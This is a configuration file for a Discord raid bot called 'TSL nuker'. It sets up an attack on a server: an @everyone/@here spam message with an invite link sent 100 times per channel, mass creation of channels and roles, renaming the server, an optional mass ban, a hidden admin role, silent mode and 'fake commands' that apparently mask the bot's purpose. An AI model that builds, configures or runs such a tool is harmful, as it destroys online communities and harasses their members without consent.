[BOT_CFG]
prefix = !
token = 
spamtext = @everyone @here Imagine get nuked by TSL bot discord.gg/tslontop XD
ac_name = TSL nuker on top
ac_type = 1
silent_mode = 0
channels and roles name = nuked by TSL nuker
webhooks name = TSL nuker
server name = nuked by TSL nuker L
ban reason = XDDDD
how much pings per channel do you want? = 100
how much channels do you want? = 35
how much roles do you want? = 40
admin role name = TSL Admin Power
ban people while i nuking the server? = 0
[Nuker mode]
Mode = 1

[Fake commands]
Enabled? = 1
